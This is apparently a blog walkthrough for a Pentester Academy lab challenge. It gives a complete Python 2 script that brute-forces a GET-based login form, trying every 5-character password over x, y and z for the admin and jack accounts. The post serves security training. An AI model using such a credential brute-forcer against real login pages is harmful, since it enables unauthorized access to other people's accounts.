Pentester Academy GET Method Challenge 1 via Python



The Challenge 1 for Pentester Academy uses GET method for sending over the credentials. So the username and password go like:
http://pentesteracademylab.appspot.com/lab/webapp/1?email=admin%40PentesterAcademy.com&password=zzzxx

Also one big hint dropped here is that the domain is PentesterAcademy.com. So the email addresses would look like admin@PentesterAcademy.com and jack@PentesterAacademy.com.
I reused the code for generating all combinations of x, y and z from my previous blog post aimed at challenge 3. We just need to update the URL with the username and the password while sending the request for each combination.

But how do we verify if the credentials have been accepted as valid or rejected? The webpage says “Failed! Please try again!” if the credentials are rejected. So we can search for the string “Failed” in the response to check if the credentials were accepted.

The complete solutions looks as follows:
import urllib2
import sys
def fun(a):
    chars="xyz"
    l = len(a)
    lenthPerWord = len(a[0])
    if lenthPerWord == 5:
        return a
    c=[]
    for i in range(0,l):
        for j in chars:
            c.append(j+a[i])
    return fun(c)
c=['x','y','z']
listOfPass=fun(c)

for user in ["admin","jack"]:
    for password in listOfPass:
        url = ("http://pentesteracademylab.appspot.com/lab/webapp/1?email=%s&password=%s") %(user+"@PentesterAcademy.com",password)
        r=urllib2.Request(url)
        handle=urllib2.urlopen(r)
       
        response = handle.read()
        handle.close()
        if not "Failed" in str(response):
            print "Succeeded for "+user+":"+password
            print str(response)
            sys.exit(1)
        else:
            print "Failed for "+user+":"+password

Comments

Post a Comment

Popular posts from this blog

Disable Low and Medium Strength Cipher for Java Applications

I use SSL so I am secure, right? - Wrong A commonplace feeling is that if you are using TLS/SSL for communication between different components, the data in transit is safe. This is a misconception since the security of data in transit depends on what exact algorithms are being used for encryption. Some of the algorithms are deemed to be broken such as MD5 and RC4. During the negotiation between a client and a server when a TLS/SSL connection initiates, both the parties mutually decide which SSL version and cipher suite to go with for rest of the communication. SSL version 2 is considered to be unsafe while SSL v3 and TLS v1 are considerd safe. Cipher What? - Cipher Suite Cipher suites is a named combination of algorithms used for encryption when using TLS/SSL. It contains the encryption algorithm (like DES, RC4, AES) and the key size like (40, 56, 128 bit) and the hashing algorithm (like SHA and MD5). eg.  RSA_WITH_RC4_128_SHA.  Key size defines if the cipher is lo...
Read more

Pentester Academy Basic Authentication Challenge 3 via Python

Since I am learning python here is a try at solving a Basic Auth Brute Force challenge posted at Pentester Academy: http://pentesteracademylab.appspot.com/lab/webapp/basicauth The challenge is Basic in difficulty level and already provides the usernames: nick or admin. The password is of 5 letters and consists of only a , s and d . So the problem can be divided into two parts: 1. Creating all the password combinations Here is the recursive function that returns a list of all the 5 letter combinations of a , s and d : def fun(a):     chars="asd"     l = len(a)     lenthPerWord = len(a[0])     if lenthPerWord == 5:         return a     c=[]     for i in range(0,l):         for j in chars:                      ...
Read more